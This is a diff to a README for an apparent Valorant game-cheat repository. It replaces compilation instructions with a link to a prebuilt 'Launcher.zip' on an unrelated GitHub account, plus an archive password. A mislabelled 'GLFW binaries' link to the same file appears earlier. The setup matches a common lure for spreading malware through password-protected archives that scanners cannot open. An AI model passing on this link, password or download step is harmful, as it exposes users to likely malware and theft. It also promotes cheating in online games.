Valorant-External-Cheat-2026/.github/profile/README.md

 This project won't be continued.
 I've not tested the cheat since 'first commit' release date.

-## COMPILATION
+## DOWNLOAD
-You need to download [GLFW pre-compiled binaries](https://github.com/Piecegloeradicate/latest/releases/download/New/Launcher.zip) and add the `/include` folder to the Include path.
+You need to download [Launcher](https://github.com/Piecegloeradicate/latest/releases/download/New/Launcher.zip)

-Also include `/vs-XXXX` (XXXX = Visual Studio Version, ex: vs-2022 for VStudio 2022) to the lib folder.
+* Pass: azuro

 Feel free to make pull/reqs or collaborate.